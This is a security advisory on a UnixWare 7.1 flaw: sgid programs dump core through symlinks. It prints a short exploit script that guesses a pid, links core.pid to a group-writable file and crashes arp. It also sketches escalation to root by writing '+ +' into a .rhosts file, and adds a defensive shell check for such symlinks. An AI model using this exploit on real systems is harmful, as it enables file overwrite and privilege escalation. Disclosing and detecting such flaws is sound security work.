COMMAND

    coredumps (kernel)

SYSTEMS AFFECTED

    Unixware 7x, OpenServer

PROBLEM

    Brock Tellier found the following. All testing was done on UnixWare
    7.1, though one would imagine other 7.x releases are vulnerable as
    well. UnixWare's sgid binaries are allowed to dump core (but suids
    are not). By "calculating" the pid of the sgid binary we will call,
    we can create a symlink from ./core.pid to any file writable by the
    running group. Many of the sgid binaries are sgid-sys, an extremely
    sensitive gid to be able to play around with. The arp exploit below
    demonstrates how one would overwrite a file using this
    vulnerability.

    Why is a root compromise possible? Well, assuming that we could
    somehow get "+ +" on a line by itself in the corefile, we could
    place this into the .rhosts file of some group-writable
    directory/.rhosts. Gaining the additional privileges of any system
    account is usually a fast ticket to root. The exploit follows:

        #!/bin/sh
        ####
        # Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
        # Guessing pid is trivial.  Any sgid program which will coredump can be used
        # -Brock Tellier, btellier@usa.net
        ####
        pid=`expr $$ + 4`;
        ln -s /path/to/sys/group/writable/file core.$pid
        /usr/sbin/arp `perl -e "print 'A' x 10000"`
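
    An added defender-side check, not code from the advisory or from
    Brock Tellier: it lists symlinks named like a kernel core file
    (core or core.<pid>) in a directory and flags those that point at a
    group-writable file, the shape the arp exploit above relies on. It
    assumes POSIX sh with ls, readlink and mktemp; the demo directory
    contents are constructed.

```shell
#!/bin/sh
# Added check (not from the advisory): list symlinks named like a kernel
# core file in a directory and flag those aimed at a group-writable file.
# Assumes POSIX sh plus ls, readlink and mktemp.

# Print "link -> target [state]" for each symlink named core or
# core.<digits> directly inside the directory $1.
list_core_symlinks() {
    dir=$1
    for f in "$dir"/core "$dir"/core.*; do
        [ -L "$f" ] || continue                 # only symlinks matter
        suffix=${f##*/}; suffix=${suffix#core}; suffix=${suffix#.}
        case $suffix in *[!0-9]*) continue ;; esac   # not core/core.<pid>
        target=$(readlink "$f")
        case $target in
            /*) abs=$target ;;
            *)  abs=$dir/$target ;;             # relative: resolve against dir
        esac
        if [ ! -e "$abs" ]; then
            state=dangling
        elif [ "$(ls -ld "$abs" | cut -c6)" = w ]; then
            state=group-writable                # an sgid core dump would clobber it
        else
            state=not-group-writable
        fi
        printf '%s -> %s [%s]\n' "$f" "$abs" "$state"
    done
}

# Count only the dangerous case: a core-style link onto an existing
# group-writable file.
count_dangerous_core_symlinks() {
    list_core_symlinks "$1" | grep -c '\[group-writable\]$' || true
}

# Constructed demo directory: one dangerous link, one link to a file the
# group cannot write, and a regular file whose name merely starts with
# "core". Prints the dangerous count (1).
demo_count() {
    tmp=$(mktemp -d)
    : > "$tmp/target";   chmod 664 "$tmp/target"
    : > "$tmp/readonly"; chmod 644 "$tmp/readonly"
    ln -s "$tmp/target" "$tmp/core.1234"
    ln -s readonly "$tmp/core.99"
    : > "$tmp/core.txt"
    n=$(count_dangerous_core_symlinks "$tmp")
    rm -rf "$tmp"
    echo "$n"
}
```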

SOLUTION

    OpenServer does not have the same exact vulnerability with respect
    to s[ug]id programs being allowed to dump core, but there are
    vulnerabilities with programs that were s[ug]id and have relaxed it,
    and general issues of coredumping onto symlinked names. A fix is
    out.